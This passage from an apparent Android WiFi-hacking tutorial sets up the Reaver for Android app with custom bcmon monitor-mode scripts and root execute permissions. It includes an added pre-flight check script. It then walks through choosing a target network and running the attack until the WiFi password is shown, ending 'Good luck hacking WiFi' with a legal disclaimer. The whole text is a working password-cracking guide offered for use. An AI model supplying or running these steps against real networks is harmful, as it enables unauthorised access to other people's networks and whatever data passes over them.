Using Custom Scripts To Activate Monitor Mode.

Since the device is not bcmon-supported, we need RfA to depend less on bcmon itself; this gives better results. We will use custom monitor-mode activation scripts. Copy the code below into a text editor and save each script with a .sh extension somewhere you can find easily. You can use ES File Explorer for this. Save them with Unix (LF) line endings: a script saved with Windows (CRLF) endings will not run, because the shell treats the carriage return as part of every command, starting with the #!/bin/bash line.

start.sh (enables monitor mode and exits)

#!/bin/bash
svc wifi disable
# Start a shell with bcmon's libraries on the loader path and its fake driver
# preloaded. RfA executes the script's lines through its own root shell, so the
# sh started here keeps reading the lines that follow and runs them with the
# preload in effect.
LD_LIBRARY_PATH=/data/data/com.bcmon.bcmon/files/libs LD_PRELOAD=/data/data/com.bcmon.bcmon/files/libs/libfake_driver.so sh
cd /data/data/com.bcmon.bcmon/files/tools
./enable_bcmon
# RfA looks for this word to know the step succeeded.
echo "rfasuccess"
exit

warm.sh

RfA will read the script and execute the commands internally. This is needed to execute reaver in the same terminal session as the script: unlike start.sh it does not exit, so the shell is left in the tools directory with the preload active and RfA runs reaver there.

#!/bin/bash
LD_LIBRARY_PATH=/data/data/com.bcmon.bcmon/files/libs LD_PRELOAD=/data/data/com.bcmon.bcmon/files/libs/libfake_driver.so sh
cd /data/data/com.bcmon.bcmon/files/tools

stop.sh (disables monitor mode)

#!/bin/bash
svc wifi enable
echo "rfasuccess"

*. Now open Root Explorer.
*. Navigate to /data/data/com.bcmon.bcmon/files/tools/reaver.
*. Long press it, choose 'Permissions', check the Execute boxes (all three: owner, group and others) and tap OK.
*. Go back to tools, long press enable_bcmon and grant it execute rights the same way (all three), then tap OK.
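A missed file or a forgotten execute bit from the copy-and-chmod steps above only shows up later as a failed monitor-mode test in RfA, with no hint of the cause. The script below is an added example, not part of the original post or of RfA: a pre-flight check that reports exactly what is wrong, the chmod equivalent of ticking the three execute boxes, and a check that the three .sh files have Unix line endings. BCMON_DIR defaults to the path the post uses; set it to a scratch directory to try the script off the phone. Function names are mine.

```shell
#!/bin/sh
# Added example (not from the original post): pre-flight check for the manual
# bcmon setup. Run it from a root shell on the phone, or point BCMON_DIR at a
# scratch directory elsewhere.
BCMON_DIR=${BCMON_DIR:-/data/data/com.bcmon.bcmon/files}

# Report every missing or non-executable piece; succeed only when all are fine.
check_bcmon_layout() {
    dir=${1:-$BCMON_DIR}
    problems=0
    # the fake driver that start.sh and warm.sh preload
    if [ ! -f "$dir/libs/libfake_driver.so" ]; then
        echo "missing: $dir/libs/libfake_driver.so (copy the apk's assets again)"
        problems=$((problems + 1))
    fi
    # the two binaries that were given execute rights by hand
    for t in enable_bcmon reaver; do
        if [ ! -f "$dir/tools/$t" ]; then
            echo "missing: $dir/tools/$t"
            problems=$((problems + 1))
        elif [ ! -x "$dir/tools/$t" ]; then
            echo "not executable: $dir/tools/$t (tick all three execute boxes, i.e. chmod 755)"
            problems=$((problems + 1))
        fi
    done
    [ "$problems" -eq 0 ]
}

# The chmod equivalent of ticking the three execute boxes in Root Explorer.
fix_bcmon_perms() {
    dir=${1:-$BCMON_DIR}
    chmod 755 "$dir/tools/enable_bcmon" "$dir/tools/reaver"
}

# start.sh, warm.sh and stop.sh must have Unix line endings: a stray carriage
# return makes the shell look for "bash\r" and every later command fails too.
script_line_endings_ok() {
    if grep -q "$(printf '\r')" "$1"; then
        echo "$1 has Windows line endings; re-save it with LF endings"
        return 1
    fi
    return 0
}

# Demo against the default location (only meaningful on the phone).
check_bcmon_layout "$BCMON_DIR" || echo "fix the problems above before testing monitor mode in RfA"
for s in start.sh warm.sh stop.sh; do
    [ -f "$s" ] && script_line_endings_ok "$s"
done
```

Run it once after the copy step and once after setting permissions; the second run should print nothing. If check_bcmon_layout is clean but RfA's monitor-mode test still fails, the problem is the adapter or its driver, not the file layout.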

Step By Step instructions to hack WiFi using Android

Now that the scripts and required apps are set up, we can move on to the attack itself. Follow the instructions carefully. This part deals specifically with the Reaver app.

*. Open the Reaver app and scan for networks.
*. Select one that RfA shows in green and that is in good range. For quicker cracking and better results use an OTG external WiFi adapter, if your device supports one.

*. Go to Settings and open the monitor-mode settings. Uncheck 'Use bcmon' and tap 'Browse' to load the three scripts.
*. start.sh is the activation script, warm.sh is the warm-up script and stop.sh is the stop script.
*. Check the debugging mode option.

*. Now go back to the attack screen and press 'Test monitor-mode'. Grant root permission if a popup appears. Press OK and then press 'Start attack'.

*. The rest of the steps are the same as in the previous tutorial.
*. Wait until the WiFi password is cracked and displayed by Reaver.

That's all. Good luck hacking WiFi. I am not responsible for any damage caused to your device. Unauthorized attempts to hack WiFi are a criminal offence punishable by law. Try it at your own risk.